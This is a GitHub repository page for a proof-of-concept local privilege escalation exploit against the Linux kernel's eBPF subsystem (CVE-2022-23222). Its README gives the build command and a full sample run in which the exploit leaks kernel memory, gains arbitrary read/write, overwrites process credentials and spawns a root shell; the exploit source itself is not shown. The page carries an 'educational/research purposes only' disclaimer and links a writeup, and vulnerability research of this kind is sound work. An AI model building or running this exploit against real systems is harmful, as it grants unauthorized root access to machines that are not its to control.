Skip to content

CVE-2022-23222: Linux Kernel eBPF Local Privilege Escalation

Notifications You must be signed in to change notification settings

tr3ee/CVE-2022-23222

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

1 Commit
 
 
 
 
 
 
 
 

Repository files navigation

CVE-2022-23222

Chinese writeup: https://tr3e.ee/posts/cve-2022-23222-linux-kernel-ebpf-lpe.txt

For educational/research purposes only. Use at your own risk.

Build & Run

$ make
cc -I include -static -w -o exploit exploit.c
$ ./exploit 
[*] phase(1/8) 'create bpf map(s)' running
[+] phase(1/8) 'create bpf map(s)' done
[*] phase(2/8) 'do some leak' running
[+] phase(2/8) 'do some leak' done
[*] phase(3/8) 'prepare arbitrary rw' running
[+] phase(3/8) 'prepare arbitrary rw' done
[*] phase(4/8) 'spawn processes' running
[+] phase(4/8) 'spawn processes' done
[*] phase(5/8) 'find cred (slow)' running
[+] phase(5/8) 'find cred (slow)' done
[*] phase(6/8) 'overwrite cred' running
[+] phase(6/8) 'overwrite cred' done
[*] phase(7/8) 'spawn root shell' running
[+] Enjoy root!
# id
uid=0(root) gid=0(root) groups=65534(nobody)
# exit
[+] phase(7/8) 'spawn root shell' done
[*] phase(8/8) 'clean up the mess' running
[+] phase(8/8) 'clean up the mess' done

About

CVE-2022-23222: Linux Kernel eBPF Local Privilege Escalation

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published